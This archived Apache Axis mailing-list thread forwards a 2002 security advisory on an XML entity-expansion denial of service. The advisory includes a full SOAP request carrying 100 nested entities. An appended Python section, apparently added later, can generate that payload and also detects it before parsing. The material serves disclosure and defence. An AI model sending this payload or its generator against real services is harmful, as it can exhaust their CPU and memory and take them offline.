axis-java-dev mailing list archives
From Davanum Srinivas <d...@yahoo.com>
Subject Re: Fw: Security Alert - Apache/Axis
Date Tue, 26 Nov 2002 19:03:22 GMT
I think tom fixed it (http://marc.theaimsgroup.com/?l=axis-dev&m=103773176108393&w=2)

Thanks,
dims

--- Ted Leung <twleung@sauria.com> wrote:
> This security alert came through today.
> 
> Ted
> ----- Original Message -----
> From: "Ian Holsman" <ianh@cnet.com>
> To: <security@apache.org>
> Cc: "Ory Segal" <ORY.SEGAL@sanctuminc.com>
> Sent: Tuesday, November 26, 2002 8:02 AM
> Subject: Security Alert - Apache/Axis
> 
> 
> > Dear security@apache.org,
> >
> > During a recent security audit at one of our customers, Sanctum found a
> > security vulnerability in your product Apache/Axis.
> > The details of this vulnerability are described in the attached text file.
> >
> > We intend to issue a public advisory on BugTraq, SecuriTeam and other site
> > forums about this vulnerability the last week of November.  Please note, the
> > advisory will not contain specifics that might enable someone to exploit the
> > vulnerability.
> >
> > We would appreciate it if you could issue a patch in that timeline (i.e.
> > around November 25th), so it can be linked to our advisory.
> >
> > Please feel free to contact me for more information/help.
> >
> > Thanks,
> > -Amit
> >
> >  <<XML_DTD_Axis.txt>>
> >
> >
> 
> 
> 
> > ///////////////////////////////////////////////////////////////////////
> ========================>> Security Advisory <<========================
> ///////////////////////////////////////////////////////////////////////
> 
> 
> => Author: Amit Klein - Sanctum inc. http://www.sanctuminc.com/
> 
> => Release date: 14/Nov/2002
> 
> => Vendor: Apache Group
> 
> The following product was found to be vulnerable: 
> 
>   - Apache Axis SOAP server (checked with Xerces-J and Tomcat)
> 
> The versions affected are the latest ones (as of October 2002).
> 
> => Severity: High
> 
> => CVE candidate: Not assigned yet.
> 
> => Summary: Using the DTD part of the XML document, it is possible to cause the 
> XML parser to consume 100% CPU and/or a lot of memory, therefore resulting in 
> a denial of service condition.
> 
> => Description: The DTD part of the XML document enables the document to define 
> named entities (other than the predefined &lt;, &gt;, etc.). The entities can be
> defined using other entities (recursion is prohibited in XML 1.0).
> Entities are expanded when they are referenced, inside the XML document. 
> The attack is comprised of defining and referencing an entity which is defined 
> using two instances of another entity, which is (in turn) defined as two instances
> of yet another entity, and so on. This definition process can be repeated as long
> as "necessary" - we found that nesting level of 100 is usually sufficient.
> The 100th entity should be defined simply as a string. This has the effect of having
> the first entity contain, in theory, 2^99 (two to the power of ninety nine) 
> concatenated values of the 100th entity.
> Here's an example (the DTD is to be placed after the XML declaration, and before the
> root element of the XML document):
> 
> 	<!DOCTYPE root [
> 	<!ENTITY x100 "foobar">
> 	<!ENTITY  x99 "&x100;&x100;">
> 	<!ENTITY  x98 "&x99;&x99;">
> 	<!ENTITY  x97 "&x98;&x98;">
> 	...
> 	<!ENTITY   x3 "&x4;&x4;">
> 	<!ENTITY   x2 "&x3;&x3;">
> 	<!ENTITY   x1 "&x2;&x2;">
> 	]>
> 
> Referring to the first entity inside a document that would otherwise be accepted by
> the application (using the syntax &x1;), results in a DoS condition, due to the 
> excessive CPU load and/or memory load required by the XML parser to expand this entity.
> 
> => Solution: Not available yet.
> 
> => Workaround: Not available yet.
> 
> => Example:
> 
> Ory Segal from Sanctum devised a SOAP request that manages to mount this attack requiring
> only a path to an existing web service to be known to the attacker.
> 
> The request is:
> 
> POST path_to_web_service HTTP/1.0
> Host: ...
> Content-Type: text/xml
> SOAPAction: ""
> Content-Length: 3224
> 
> <?xml version="1.0" ?>
> <!DOCTYPE foobar [
> 	<!ENTITY x0 "hello">
> 	<!ENTITY x1 "&x0;&x0;">
> 	<!ENTITY x2 "&x1;&x1;">
> 	<!ENTITY x3 "&x2;&x2;">
> 	<!ENTITY x4 "&x3;&x3;">
> 	<!ENTITY x5 "&x4;&x4;">
> 	<!ENTITY x6 "&x5;&x5;">
> 	<!ENTITY x7 "&x6;&x6;">
> 	<!ENTITY x8 "&x7;&x7;">
> 	<!ENTITY x9 "&x8;&x8;">
> 	<!ENTITY x10 "&x9;&x9;">
> 	<!ENTITY x11 "&x10;&x10;">
> 	<!ENTITY x12 "&x11;&x11;">
> 	<!ENTITY x13 "&x12;&x12;">
> 	<!ENTITY x14 "&x13;&x13;">
> 	<!ENTITY x15 "&x14;&x14;">
> 	<!ENTITY x16 "&x15;&x15;">
> 	<!ENTITY x17 "&x16;&x16;">
> 	<!ENTITY x18 "&x17;&x17;">
> 	<!ENTITY x19 "&x18;&x18;">
> 	<!ENTITY x20 "&x19;&x19;">
> 	<!ENTITY x21 "&x20;&x20;">
> 	<!ENTITY x22 "&x21;&x21;">
> 	<!ENTITY x23 "&x22;&x22;">
> 	<!ENTITY x24 "&x23;&x23;">
> 	<!ENTITY x25 "&x24;&x24;">
> 	<!ENTITY x26 "&x25;&x25;">
> 	<!ENTITY x27 "&x26;&x26;">
> 	<!ENTITY x28 "&x27;&x27;">
> 	<!ENTITY x29 "&x28;&x28;">
> 	<!ENTITY x30 "&x29;&x29;">
> 	<!ENTITY x31 "&x30;&x30;">
> 	<!ENTITY x32 "&x31;&x31;">
> 	<!ENTITY x33 "&x32;&x32;">
> 	<!ENTITY x34 "&x33;&x33;">
> 	<!ENTITY x35 "&x34;&x34;">
> 	<!ENTITY x36 "&x35;&x35;">
> 	<!ENTITY x37 "&x36;&x36;">
> 	<!ENTITY x38 "&x37;&x37;">
> 	<!ENTITY x39 "&x38;&x38;">
> 	<!ENTITY x40 "&x39;&x39;">
> 	<!ENTITY x41 "&x40;&x40;">
> 	<!ENTITY x42 "&x41;&x41;">
> 	<!ENTITY x43 "&x42;&x42;">
> 	<!ENTITY x44 "&x43;&x43;">
> 	<!ENTITY x45 "&x44;&x44;">
> 	<!ENTITY x46 "&x45;&x45;">
> 	<!ENTITY x47 "&x46;&x46;">
> 	<!ENTITY x48 "&x47;&x47;">
> 	<!ENTITY x49 "&x48;&x48;">
> 	<!ENTITY x50 "&x49;&x49;">
> 	<!ENTITY x51 "&x50;&x50;">
> 	<!ENTITY x52 "&x51;&x51;">
> 	<!ENTITY x53 "&x52;&x52;">
> 	<!ENTITY x54 "&x53;&x53;">
> 	<!ENTITY x55 "&x54;&x54;">
> 	<!ENTITY x56 "&x55;&x55;">
> 	<!ENTITY x57 "&x56;&x56;">
> 	<!ENTITY x58 "&x57;&x57;">
> 	<!ENTITY x59 "&x58;&x58;">
> 	<!ENTITY x60 "&x59;&x59;">
> 	<!ENTITY x61 "&x60;&x60;">
> 	<!ENTITY x62 "&x61;&x61;">
> 	<!ENTITY x63 "&x62;&x62;">
> 	<!ENTITY x64 "&x63;&x63;">
> 	<!ENTITY x65 "&x64;&x64;">
> 	<!ENTITY x66 "&x65;&x65;">
> 	<!ENTITY x67 "&x66;&x66;">
> 	<!ENTITY x68 "&x67;&x67;">
> 	<!ENTITY x69 "&x68;&x68;">
> 	<!ENTITY x70 "&x69;&x69;">
> 	<!ENTITY x71 "&x70;&x70;">
> 	<!ENTITY x72 "&x71;&x71;">
> 	<!ENTITY x73 "&x72;&x72;">
> 	<!ENTITY x74 "&x73;&x73;">
> 	<!ENTITY x75 "&x74;&x74;">
> 	<!ENTITY x76 "&x75;&x75;">
> 	<!ENTITY x77 "&x76;&x76;">
> 	<!ENTITY x78 "&x77;&x77;">
> 	<!ENTITY x79 "&x78;&x78;">
> 	<!ENTITY x80 "&x79;&x79;">
> 	<!ENTITY x81 "&x80;&x80;">
> 	<!ENTITY x82 "&x81;&x81;">
> 	<!ENTITY x83 "&x82;&x82;">
> 	<!ENTITY x84 "&x83;&x83;">
> 	<!ENTITY x85 "&x84;&x84;">
> 	<!ENTITY x86 "&x85;&x85;">
> 	<!ENTITY x87 "&x86;&x86;">
> 	<!ENTITY x88 "&x87;&x87;">
> 	<!ENTITY x89 "&x88;&x88;">
> 	<!ENTITY x90 "&x89;&x89;">
> 	<!ENTITY x91 "&x90;&x90;">
> 	<!ENTITY x92 "&x91;&x91;">
> 	<!ENTITY x93 "&x92;&x92;">
> 	<!ENTITY x94 "&x93;&x93;">
> 	<!ENTITY x95 "&x94;&x94;">
> 	<!ENTITY x96 "&x95;&x95;">
> 	<!ENTITY x97 "&x96;&x96;">
> 	<!ENTITY x98 "&x97;&x97;">
> 	<!ENTITY x99 "&x98;&x98;">
> 	<!ENTITY x100 "&x99;&x99;">
> ]>
> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
> xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"
> xmlns:xsd="http://www.w3.org/1999/XMLSchema">
> <SOAP-ENV:Body>
> <ns1:aaa xmlns:ns1="urn:aaa" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
> <foobar xsi:type="xsd:string">&x100;</foobar>
> </ns1:aaa>
> </SOAP-ENV:Body>
> </SOAP-ENV:Envelope>
> 
> 


=====
Davanum Srinivas - http://xml.apache.org/~dims/
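The advisory above explains the attack (each entity is two copies of the next one, so the
top entity stands for 2^99 copies of a short string) but gives no check a service owner
could run before handing the request to the parser. The following is an added example
written for this archive page; it is not code from the advisory, from Axis, or from
Xerces. It rebuilds the nested-entity DTD in the advisory's layout, wraps it in a SOAP
request like the one Ory Segal posted, and, before parsing, computes how large every
declared entity would become from the declarations alone (linear in the size of the DTD,
never materialising the expansion). The one-megabyte budget, the "reject before parse"
policy and the parameter names are hypothetical choices for illustration; the scanner
only understands the double-quoted internal-subset form the payload uses.

```python
import re
import xml.etree.ElementTree as ET

PREDEFINED = {"lt", "gt", "amp", "apos", "quot"}  # each expands to a single character
ENTITY_DECL = re.compile(r'<!ENTITY\s+(\w+)\s+"([^"]*)"\s*>')
ENTITY_REF = re.compile(r"&(\w+);")
INTERNAL_SUBSET = re.compile(r"<!DOCTYPE[^\[>]*\[(.*?)\]\s*>", re.S)


def build_entity_bomb(depth=100, payload="foobar"):
    """Internal DTD subset laid out as in the advisory: x<depth> is a literal
    string and every x<k> is two copies of x<k+1>, so &x1; stands for
    2**(depth-1) copies of the payload (2**99 * 6 bytes for the defaults)."""
    decls = [f'<!ENTITY x{depth} "{payload}">']
    for k in range(depth - 1, 0, -1):
        decls.append(f'<!ENTITY x{k} "&x{k + 1};&x{k + 1};">')
    return "<!DOCTYPE root [\n" + "\n".join("\t" + d for d in decls) + "\n]>"


def soap_envelope(dtd, entity_name):
    """Constructed SOAP 1.1 request in the shape of the advisory's example: the
    entity is referenced from a string parameter of a made-up operation."""
    return (
        '<?xml version="1.0" ?>\n' + dtd + "\n"
        '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"'
        ' xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"'
        ' xmlns:xsd="http://www.w3.org/1999/XMLSchema">'
        '<SOAP-ENV:Body><ns1:aaa xmlns:ns1="urn:aaa">'
        f'<foobar xsi:type="xsd:string">&{entity_name};</foobar>'
        "</ns1:aaa></SOAP-ENV:Body></SOAP-ENV:Envelope>"
    )


def internal_entities(doc):
    """General entities declared in the internal subset, name -> literal value."""
    m = INTERNAL_SUBSET.search(doc)
    return dict(ENTITY_DECL.findall(m.group(1))) if m else {}


def expanded_size(entities, name, memo=None, stack=frozenset()):
    """Length of entity `name` after full expansion, derived from the
    declarations without ever building the string. A cycle (forbidden by
    XML 1.0, but a hostile DTD may contain one) raises instead of looping."""
    if name in PREDEFINED:
        return 1
    if name in stack:
        raise ValueError(f"recursive entity {name}")
    if name not in entities:
        raise ValueError(f"undeclared entity {name}")
    memo = {} if memo is None else memo
    if name not in memo:
        value, total, pos = entities[name], 0, 0
        for ref in ENTITY_REF.finditer(value):
            total += ref.start() - pos                      # literal text before the reference
            total += expanded_size(entities, ref.group(1), memo, stack | {name})
            pos = ref.end()
        memo[name] = total + len(value) - pos               # literal text after the last reference
    return memo[name]


def max_expansion(doc):
    """Largest size any single declared entity in `doc` could reach."""
    ents = internal_entities(doc)
    memo = {}
    return max((expanded_size(ents, n, memo) for n in ents), default=0)


def is_entity_bomb(doc, limit=1_000_000):
    """Hypothetical policy: any entity that could expand past `limit` bytes is
    treated as an attack, whether or not the body actually references it."""
    return max_expansion(doc) > limit


def parse_if_safe(doc, limit=1_000_000):
    """Check the declarations first; only then let the expanding parser run."""
    if is_entity_bomb(doc, limit):
        raise ValueError(f"entity expansion exceeds {limit} bytes")
    return ET.fromstring(doc)


if __name__ == "__main__":
    small = soap_envelope(build_entity_bomb(3), "x1")    # &x1; is 4 copies of "foobar"
    print(parse_if_safe(small).find(".//foobar").text)
    big = soap_envelope(build_entity_bomb(100), "x1")    # 6 * 2**99 bytes if expanded
    print(max_expansion(big), is_entity_bomb(big))
```

Running the module parses the three-level document normally and flags the hundred-level
one without the parser ever touching it. Sizing the declarations is the check to use when
a service must keep accepting DOCTYPE declarations; where it does not, the simpler and
stronger setting is to refuse any DOCTYPE at all (Xerces exposes this as the
http://apache.org/xml/features/disallow-doctype-decl feature), which removes internal
entities, and the external-entity tricks that ride on the same DTD, in one step.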
